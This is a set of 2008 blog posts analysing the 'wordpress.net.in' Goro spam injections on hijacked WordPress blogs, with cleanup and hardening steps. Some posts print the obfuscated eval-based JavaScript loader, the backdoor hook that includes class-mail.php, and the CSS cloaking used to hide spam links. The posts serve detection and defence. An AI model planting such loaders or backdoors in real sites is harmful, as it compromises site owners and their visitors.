I’ve been monitoring mattheaton.com “wordpress.net.in goro spam injections” for this past few months. Noticeably, the blackhat spamming method is changing dramatically. For those who are still unaware of Wordpress Goro Spam please read my earlier post → Wordpress.net.in Spam injection& Gaming Bluehost & Hostmonster CEO’s Blog.

thinkingphp.org (PR6) & jensfrake.com (PR7) has been hijacked by “Wordpress Blackhat SEO Spammer” for this month. Both sites were running on WordPress 2.3.2.

By now the <div id=”goro”> signature has been replaced with “Inline CSS” wrapper.

Cloacking Check on Mattheaton.com

Normal Browser

32,246 characters - mattheaton-com-source.txt

Google bot

34,646 characters - mattheaton-com-googlebot-source.txt

Difference

2,400 characters

Cloacking Check on jensfrake.com & blog.jensfrake.com

Normal Browser

59,580 characters - blogjensfrakecom.txt

Google bot

59,699 characters - blogjensfrakecom-googlebot.txt

Difference

119 characters

While scanning jensfrake.com their server return 400-500 error, so we had to scan his (clone) subdomain blog.jensfrake.com instead of the main site

This time around, you wont see the spam on both of this website, all the spam links is position out of the client view-port (top -3337px, left -2227px).

another mathematical jokes, l33t.

<div style="left: -2227px; position: absolute; top: -3337px">

What’s new with Goro spam 2008

• WordPress <= 2.3.2 is vulnerable to this attack.
• Inject Spamlinks wrap with extra Inline CSS for cloacking
• Target High PR Sites → PR5 and above

Related Post

• Matt Heaton BlueHost HostMonster CEO’s Official Blog Hacked
• How to Removed Wordpress.net.in Spam Injection
• Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II

External Links

• National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities

Wordpress 2.3.3 fixes a few minor bugs and the debatable Wordpress 2.3.2 XMLRPC vulnerability. It took 4 months to track the XMLRPC exploit and 1 days for the patch to be release. Kudos to WordPress Developer especially Ryan & Joseph Scott for these quick security release.

Wordpress 2.3.2 XMLRPC vulnerability patches by josephscott

• xmlrpc.php.diff (0.7 kB) -on 02/02/08 16:53:22.
• xmlrpc.php.2.diff (3.2 kB) - on 02/03/08 04:49:26.
• 2.3-xmlrpc.php.diff (3.2 kB) - on 02/04/08 18:48:23 (2.3.3).

External Links

• Wordpress 2.3.3 Download
• Wordpress Development Blog
• Wordpress 2.3.3 Milestone
• village-idiot.org → WordPress 2.3.3 List of changed files (download available)

This issue has been raised 4 months ago (october 2007). Certainly this is one of BadPress Ticketing Problems. Until WordPress Developer release Official securities fix (v 2.3.2.1 || 2.3.5 ?? ) You might want to try this “debatable” patch by SecuriTeam - Paul (Yabba) Jones.

Note: Matt Mullenweg & the WP-Hackers is against secureTeam “hasty-patch” and their POC release. [wp-hackers] xmlrpc issue or no?.

Excerpt from Wordpress Support Forum » iframe injection problem?

Matt Mullenweg → [...] I would rather not have people think they’re safe and really not be, and there is a release coming shortly anyway. [...]
If anyone is scared and wants a fix NOW, they should either turn off registration (which is off by default) or delete xmlrpc.php. ~ Feb 3, 2008

WordPress 2.3.3 has been release it’s advice not to try this patches

Patch xmlrpc.php via WordPress Admin

1. Login to Wordpress Admin
2. Goto Manage » Files then scroll down to “Other Files” sections, type in xmlrpc.php. otherwise type the following URL in your browser address-bar ↓

   mydomain.com/wp-admin/templates.php?file=xmlrpc.php&submit=Edit+file+%C2%BB

3. Find the following code (around Line 1151 - 1203 ) within wp_xmlrpc_server::mw_editPost() class methods ↓

   if ( ( 'post' == $post_type ) && !current_user_can('edit_post', $post_ID) )

4. Replace with

   //if ( ( 'post' == $post_type ) && !current_user_can('edit_post', $post_ID) )
    if ( ( 1 || 'post' == $post_type ) && !current_user_can('edit_post', $post_ID) )
   

   saved.

5. Disabled New User Registrations for temporary.

External Links

• Wordpress Support Forum → iframe injection problem?
• SecuriTeam → WordPress 2.3.2 XMLRPC Vulnerability POC
• Wikipedia XML-RPC
• Google → Wordpress XML-RPC Vulnerabilities
• PHPXREF wp-trunk xmlrpc source

Being Hacked by SEO spammer is seem like a yearly events at Mattheaton.com. Matt’s WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record). You can digg my earlier post at → Matt Heaton BlueHost HostMonster CEO Official Blog Hacked.

It’s a big embarrassment for bluehost & hostmonster hosting to have their CEO’s blog being spamride every year (since 2007) . Drilling Matt Heaton’s with bad ads wont solves the Blackhat Spam issues, I will left that particulars part to my readers to speculate.

Mattheaton Goro Spam Chronology

Wordpress.net.in GORO Spam Pattern

• All the infected sites will stop being index by archive.org few months before the spam started.
• From Nov 2007 to Jan 2008 (Right after Google Mass P3 De-rank fever) - The Blackhat Goro Spammer is targeting PR6 & PR7 sites running on WordPress (2.3.1 below) and on some rare case (tangonoticias.com) Joomla CMS (1.0.x)
• I categorize this blackhat method as Sybil Attack
  

  A Sybil attack is one in which an attacker subverts the reputation system by creating a large number of pseudonymous entities, and using them to gain a disproportionately large influence. A reputation system’s vulnerability to a Sybil attack depends on how cheaply Sybils can be generated, the degree to which the reputation system accepts input from entities that do not have a chain of trust linking them to a trusted entity, and whether the reputation system treats all entities identically.

  - Derank and manipulate their victim host to boost their pharmaceutical products on Google Local Search Index (gaming Localrank for better SERP)

• Goro signatures:
  1. html div with id “goro”

     <div id="goro"> <a href=">...</a> </div>
     

  2. javascript function name “getme()”

     <script type="text/javascript">function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); </script>
     

  3. Output spam on WordPress wp_footer & wp_head hook

Blackhat SEO Spamdexing Google Local Search Index

The below graph explain the Blackhat SEO Spamdexing methods for Manipulating Google Local SERP.

View Spamdexing Google Local Search Image

Note: A blackhat at hoqwarts ;)

ScreenGrab

• mattheaton.com Jan 28 2008 (1009 x 6576 pixels)
• brainwave-india.com Jan 28 2008 (1016 x 2306 pixels)
• Google Local Search Jan 28 2008 Spamdexing Results
• stc-israel.org.il Jan 28 2008 spamdexing page (hidden text)
• stc-israel.org.il Jan 28 2008 spamdexing page (text reveal)

Recent Update

• Feb 1, 2008 - we send a letter to matt@bluehost.com regarding this issue. Still waiting for his replies
• Feb 3, 2008 - The Blackhat Goro Spammer change their target spamhost from http://www.brainwave-india.com (PR6) to http://www.thinkingphp.org (PR6) - Felix Geisendörfer.

  <div id="goro"><a href="http://www.thinkingphp.org/?read=796 ... prescription</a></div><script type="text/javascript">function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); </script>

  thinkingphp.org blog is running on WordPress 2.3.2. We send him email regarding the Goro Spam hijack.

• Feb 8th 2008, There is no signature of Goro spam (tag with id goro) on Matt’s blog the blackhat is now using Inline CSS Position Overflow to hide the spams links ↓ redirect to zoorender.com (PR6).

  <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://www.zoorender.com/?discount=1776">buying .. </div>
  

• Feb 13th 2008, Same methods as above (inline css cloacking) .
  • HTML Code shown to a Regular Browser → 32,246 characters
  • HTML Code shown to Google Bot → 34,646 characters

  redirect to blog.jensfranke.com (PR7).

  <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://blog.jensfranke.com/?read=606">buy generic fi
  

• Feb 20th 2008, CSS Cloacking redirect to http://www.entrepreneur27.org/ (PR6).

  <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://www.entrepreneur27.org/?more=1591">bad side effects of viagra</a>&nbsp;<a href="http://www.entrepreneur27.org/?more=1592"> ...
  </div>
  

• Feb 24th 2008, CSS Cloacking redirect to http://www.latenightpc.com (PR5). mattheaton-com-022408-source.txt
• Feb 26th 2008, CSS Cloacking redirect to http://www.communitynext.com/ WordPress 2.3.3 (PR6). mattheaton-com-022608-source.txt

Related Posts

• How to Removed wordpress.net.in Spam Injection
• Matt Heaton BlueHost HostMonster CEO Official Blog Hacked

External Links

• Bluehost & Hostmonster CEO’s Blog
• National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities
• Wikipedia → Spamdexing
• pseudo-flaw - more random wordpress blogs owned by seo spammers

I just upgrade today, WordPress 2.3.2, fixed a nasty vulnerability. I haven’t did any test yet but according to “blackhat domainer” you can view WordPress Draft Entry via simple URL parameters without log in (un-authorize view).

WordPress developer had to release this ’securities’ fixes before the upcoming 2.4. You could either wait for 2.4 (the milestone is almost ready?) or upgrade immediately. But before others exploit this vulnerability its better to upgrade.

Peter Westwood’s sum up all wordpress 2.3.2 recent change and update in details. Read it first before you decide to upgrade.

External Links

• How to know today what ShoeMoney is going to post tomorrow
• Wordpress 2.3.2 Announcements (dev blog)

I used gravatars2 plugins to support my new sexy theme. There is some minor issue (throw fatal Error in PHP5.1) with this WordPress plugin. I did asked them to updated it but till today’s this bug still exists with Gravatars2 plugins.

This “fatal error” or conflict happen if you had PHP 5 ( 5.0 > 5.1 above) with HTTPRequest Modules Installed.

Plugin could not be activated because it triggered a fatal error.
Fatal error: Cannot redeclare class httprequest in /../wp-content/plugins/gravatars2.php on line 284

HTTPRequest Classname Conflict

It’s not that hard to fix this “Naming Conflicts”. All you need is “Search and Replace” HTTPRequest class name to different name (ie: _HTTPRequest, HTTP__Request) so it wont conflict with PHP HTTPRequest Standard Class. If you don’t know how to do this. Check the below lists. It wont take long.

1. Open wp-content/plugins/gravatars2.php or http://www.my-domain-name.com/wp-admin/plugin-editor.php?file=gravatars2.php
2. Find on line 284

   class HTTPRequest

   Replace with

   class _HTTPRequest

3. Next find on line 323

   function HTTPRequest($url, $timeout)

   Replace with

   function _HTTPRequest($url, $timeout)

4. Final step find on line 408

   $hr = new HTTPRequest($url, $timeout);

   Replace with

   $hr = new _HTTPRequest($url, $timeout);

5. Save or upload back to wp-content/plugins/

Thats all

Gravatars2

For the record - “Gravatar2 developer doesn’t give support without donation”.

Excerpt from Kip Bond at zenpax.com

I am no longer giving support for this plugin without a donation — it’s becoming repetitive and not very rewarding. You can email me (kip @ this website’s hostname (zenpax.com)) with your question, and I can tell you what minimum donation amount is sufficient per the difficulty of the question. Note that this donation in no way obligates me to any contractual duties. It’s mostly a way to make sure that people have exhausted their own efforts at resolving their own problems before asking for my support. ~kip Bond

I hope these would explain some curiosity.

tips to php developer: used class_exists before declaring any user define class.

Related Links

• Gravatars2 Discussion & Support page

This is funny thought. This issue has been around for quite awhile now. Matt’s said ([wp-hackers] Decision time in re: admin rework) they wont change the “Howdy” to “hello” or “G’day” as its a localization specific (l10n). Thats true. But If you think proper greeting is important, you can try the following steps.

Wordpress admin-header.php

• Open */wp-admin/admin-header.php
• Login to WordPress Admin goto Manage > Files > Type in “wp-admin/admin-header.php”
  
• find on line 46

  <div id="user_info"><p><?php printf(__('Howdy, <strong>%s</strong>.'), $user_identity) ?> [<a href="<?php echo get_option('siteurl'); ?>/wp-login.php?action=logout" title="<?php _e('Log out of this account') ?>"><?php _e('Sign Out'); ?></a>, <a href="profile.php"><?php _e('My Profile'); ?></a>] </p></div>
  

• Replace with

  <div id="user_info"><p><?php echo __('Hello').', <strong>' $user_identity.'</strong>'; ?> [<a href="<?php echo get_option('siteurl'); ?>/wp-login.php?action=logout" title="<?php _e('Log out of this account') ?>"><?php _e('Sign Out'); ?></a>, <a href="profile.php"><?php _e('My Profile'); ?></a>] </p></div>
  

g’day :p

Related Links

• Wordpress Ideas & Suggestions

Dec 11 2007 - Matt Heaton Blog’s has been cleansed. ATM he’s using latest version of WordPress (2.3.x). And also most of the blogs lists in this articles has been upgrade.

Jan 26th, 2008 - Seem like bluehost engineer did a bad job at cleaning, the goro spam is back.

Just after the recent issue on wordpress.com.cn now there is new wordpress imitater. A remote spamware injection by wordpress.net.in

I was reading one of Matt Heaton posted 2 days ago when I found bunch of spamsware link on his wordpress footer.

Matt’s is using default wodpress theme (kubrick) with single javascript for adsense. The only way the spams can get in is probably via php injection or by manual editing. All the spamware is redirect to howardowens.com/?order=XX page.

Lookup for howardowens.com

The below diagram explained the lookup results for howardowens.com. click on the image to enlarge.

Surprisingly the spammer website is also host by bluehost.com (69.89.16.0/20,74.220.192.0/19 ,69.89.16.4 -> box183.bluehost.com).

Tracking the spam sources.

Raw whois for wordpress.net.in

Domain ID:D2500581-AFIN
Domain Name:WORDPRESS.NET.IN
Created On:22-Apr-2007 12:01:55 UTC
Last Updated On:22-Jun-2007 02:26:40 UTC
Expiration Date:22-Apr-2008 12:01:55 UTC
Sponsoring Registrar:Direct Information Pvt. Ltd. dba PublicDomainRegistry.com (R5-AFIN)
Status:OK
Registrant ID:DI_4275224
Registrant Name:Mick Jagger
Registrant Organization:N/A
Registrant Street1:1 Red Square
Registrant City:Moscow
Registrant State/Province:Massachusetts
Registrant Postal Code:123592
Registrant Country:RU
Registrant Phone:+007.7581235641
Registrant Email:mkk.goro@bk.ru
Admin ID:DI_4275224
Admin Name:Mick Jagger
Admin Organization:N/A
Admin Street1:1 Red Square
Admin City:Moscow
Admin State/Province:Massachusetts
Admin Postal Code:123592
Admin Country:RU
Admin Phone:+007.7581235641
Admin Email:mkk.goro@bk.ru
Tech ID:DI_4275224
Tech Name:Mick Jagger
Tech Organization:N/A
Tech Street1:1 Red Square
Tech City:Moscow
Tech State/Province:Massachusetts
Tech Postal Code:123592
Tech Country:RU
Tech Phone:+007.7581235641
Tech Email:mkk.goro@bk.ru
Name Server:MKKG98981.MERCURY.ORDERBOX-DNS.COM
Name Server:MKKG98981.VENUS.ORDERBOX-DNS.COM
Name Server:MKKG98981.EARTH.ORDERBOX-DNS.COM
Name Server:MKKG98981.MARS.ORDERBOX-DNS.COM

Note: The registrant address on 1 red square is a famous restaurant in Moscow.

Its pretty obvious that wordpress.net.in belong to registrar in India.

Live example wordpress.net.in injection

Google query for warning “[function.include]” allintext: “wordpress.net.in” . Used fiddler or any http-inspector to trace the full header request.

1 Evan Morris

Wordpress 2.0.6 | url | screenshot

2 carwax

Wordpress 1.5.2 | url | screenshot

3 aabenthus.biz

Wordpress 2.0.x | url | screenshot

4 mythinger.com

Wordpress 2.0.2 | url | screenshot

5 classicalanglican.net

Wordpress 2.0.2 | url | screenshot

6 echo9er.net

WordPress 1.5.1 | url | screenshot

7 boyarick.com

Wordpress 2.0.2 | url | screenshot

Google Directory search for class-mail.php

Search for class-mail.php in open directory (public).
“parent directory” class-mail.php -html -htm –php -shtml -md5 -md5sums

• jean-cyril.com - wp-includes · spams link redirect to www.901am.com/?page=2157. jean-cyril.com has wp-info.txt inside his wp-includes directory. This text files hold unserialize database password and stuff.
• floaridablog.org - wp-includes · spams redirect to communications.uml.edu/sunrise/?id=1076 (University of Massachusetts Lowell) the offending spams page has been removed by UML maintainer.

Hiding from search engine Spiders

First, I did some more comparative search at archive.org for howardowens.com and mattheaton.com. It turn out both of this sites has been stop from IA Archiver few months before the spams start showing on their footer. You will need to check howardowens index on archive.org so you can understand my suspicious.

• http://web.archive.org/web/*/http://www.howardowens.com
• http://web.archive.org/web/*/http://www.mattheaton.com

Out of boredom I cloaked myself as the following agents.

• Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) - 74.6.8.125 - llf520032.crawl.yahoo.net
• Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 66.249.64.50 - crawl-66-249-64-50.googlebot.com
• Mozilla/2.0 (compatible; Ask Jeeves/Teoma) - 65.214.44.204 - egspd42002.ask.com
• Mediapartners-Google/2.1 66.249.73.213 - crawl-66-249-73-213.googlebot.com

Not much change on both of these sites. Then I read the status header, it return 404 instead of 200. Nice tricks for stopping crawler & spider from spying their joy-ride-spamhouse.

Summary

bits & bytes from this accident we knew that

• Most of the site inject are running on wordpress 2.0.6 & below
• allow_furl_open is set to true for this injection to work
• Most of the blogs owner is unaware about the spams links (cloacking)

Checkout Murray access log, it will give you some ideas with the remote injections methods.

Update

Dec 03 2007

All the spams link to howardowens.com page has been removed. I havent talk with howardowens but I assume howard’s site is being injected the same way like Matt Heaton blog.

Dec 04 2007

Mattheaton.com has a minor update, the spams now inject on both header and footer.
tangonoticias.com:7070/d_pill/577.html.
As tangonoticias.com is running on Joomla CMS they create a static “Wordpress” on port 7070 (Real Network Server & RSTP Port). This is probably a work of different attacker, taking advantage of Matt heaton blindspot. Google Cache (Nov 12)

Dec 11 2007

Matt heaton has been purified. He’s now using latest version of Wordpress (2.3.1). You can still view it on cached thought & screenshot.

Related Post

• How to Removed wordpress.net.in Spam Injection
• Jan 31st, 2008 - Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II

External Links

• Bluehost Hostmonster CEO’s blog
• DNS Lookup results for wordpress.net.in
• Aboutus.org wiki on MattHeaton.com
• National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities
• Murray’s Blog My Wordpress Cracked
• pseudo-flaw - more random wordpress blogs owned by seo spammers

I found this while browsing WordPress support forum, some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it’s a backdoor (wordpress.net.in). There is no class-mail.php in WordPress except class-phpmailer.php. So don’t get confuse by it.

Below is a quick workaround on how you can removed the offending goro spamware injection before Google banned you from the internet pipes.

Workaround

• For temporary disable remote include in php.ini settings.

  ;;;;;;;;;;;;;;;;;;
  ; Fopen wrappers ;
  ;;;;;;;;;;;;;;;;;;
  
  ; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
  allow_url_fopen = off
  allow_url_include = off
  

• Check your .htaccess for suspicious redirect.
• Find class-mail.php inside “*/wp-includes/” directory and removed it.
• Find the following code inside “*/wp-includes/default_filters.php” and removed it

  add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
  function wpc7c16<>b8466d864eeefd20050625c7775() {
  @include('./wp-includes/class-mail.php');
  if(sizeof($wparr)>0){
  echo "!div id=\"goro\"!";
  foreach($wparr as $k=>$v){
  echo "“.ucwords($v[’key’]).”\n”;
  if($i++==$inum) break;
  }
  echo “!/div!”.$_footer;
  }
  }
  

• Robots.txt Exclusion

  Optional - Prevent googlebot from indexing the static spam page.
  Login to Wordpress Admin > Manage > Files > Other Files → Key in “Robots.txt”. Add the following code.

  User-agent: Googlebot
  Disallow: /*?*
  Disallow: /*?
  

  Refer robots.txt.

Possible WordPress class (suspicious) files that would be tempered

Md5 checksum the following files, compare it with official versions from WordPress Release Archive.

• wp-db.php
• gettext.php

The above methods only remove and disabled the spams links, there is no guarantee that it will protected you from future vulnerabilities. Backup (or export your post using WordPress eXtended RSS -WRX) and perform a full upgrade.

Dec 13, 2007

I just notice this recently. You’ll need to check your site HTTP Header. Most of the hijacked websites doesn’t response with correct HTTP Status Header (400<>500). My guess is they did this to cloak from being crawl by search engine spiders. If you had cleaned all the infected files and your header doesn’t response correctly get a rookit scanner.

Check your website status header, try cloak your browser (UA) as Search Engine Crawler. The following screenshot will show you how to setup this at web-sniffer.net.

This methods may not work if the cloaking scripts used IP base tracking. So try on different user agent string (ie: inoktomi, askjeeves, ia_archiver).

Firefox Browser

You can also override your useragent string with firefox ↓.

about:config → general.useragent.overide = ‘ua strings‘

Wordpress.net.in Backdoor

Extra info

Dec 14, 2007

I did some research at archive.org. It seem our wordpress.net.in Seo Spam has been going on since 2005. The first variant used file_get_contents() PHP functions to retrieve their sources code (A UTF MAP Decoder 1974 Php Class ).

I also found a signature name alxumuk (at MIT & wordpress.net.in). His first historic test can be root back at *.media.mit.edu/~? server (I hide the userid as it may be “false positive”). After my first search on google for alxumuk all the results has been scraped out by Google & “Google alert” so there is no references to this query in Google Index.

My query for file_get_contents include require allintext:1974.* (the UTF decode package) and the signature (alxumuk) will return 403 Forbidden.

As Google Advanced Search blocked “the query” this may confirm that 1974.* (UTF decode) is probably the package for reading the bootstrap for wordpress.net.in backdoor (similar case like perl.santy net worm).

If this is a true Net Worm, I suggest anyone with older versions of Wordpress should removed\ the meta generator tag (Wordpress versions) and disabled XML-RPC(& RSD) for hardening wordpress from remote vectors vulnerabilities.

Wordpress.net.in Doorway

Dec 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/

Backdoor Files

inside wp-includes directory.

• compat.php - (replace with latest version)
• class-mail.php delete

scan & removes all backdoor files and create a .htaccess file inside wp-includes & wp-content/plugins. Then add the following code to disabled directory listing (prevent informations leak & Directory search index).

Options -Indexes

Wordpress.net.in New Partner

Feb 23th 2008, We found a similar signature like wordpress.net.in at qwetro.com (germany). Probably from the same attacker with different agenda.

removes malicious create_function wp_head filters

This are fixes for wordpress.net.in spams header injection.

/**
 * Remove create_function action hook
 * append on wordpress wp_head filters
 *
 * @author Avice De'véreux <ck@kaizeku.com>
 * @copyright Copyright (c) 2006 Avice De'véreux
 * @version 1.0
 * @license http://www.gnu.org/licenses/lgpl.html GNU Lesser General Public License
 * @link http://blog.kaizeku.com/wordpress/goro-spam-injection-wp-head-patch/
 */
function remove_create_function_action()
{ global $wp_filter;

	$action_ref	= 'wp_head';
	$filter 	= $wp_filter[$action_ref];
	$_lambda	= array();

	foreach(range(1,10) as $priority){

		if (isset($filter[$priority]))
		{
			foreach($filter[$priority] as $registered_filter ){

				$callback = (string) $registered_filter['function'];

				if ( preg_match("/lambda/", $callback) ) {
		 	 		$_lambda[$priority][] = $callback;
				}
			}

		}
	}

	if ( count($_lambda) >= 0 ){

		foreach($_lambda as $priority => $callback) {
			if ( has_filter($action_ref,$callback) ){
				remove_filter($action_ref, $callback, $priority, 1);
			}
		}
	}
}

add_action('init','remove_create_function_action');

The plugin’s can be download at Kaizeku Ban, goro spam injection fixes

Related Posts

• Bluehost HostMonster CEO’s Blog hacked (wordpress.net.in)
• Matt Heaton Bluehost Hostmonster CEO’s Hacked Again - Strike II

External Links

• Websniffer View HTTP Request and Response Header
• Wordpress Support Forum
• National Vulnerability Database Wordpress 2.0 > 2.0.6

Short URL

WordPress 2.3.1 Support Windows Live Writer RSD. I’m posting this via live writer. You can download this Polaroid plugins at LiveWriter Addons Gallery .

Photo courtesy of ChaosKaizer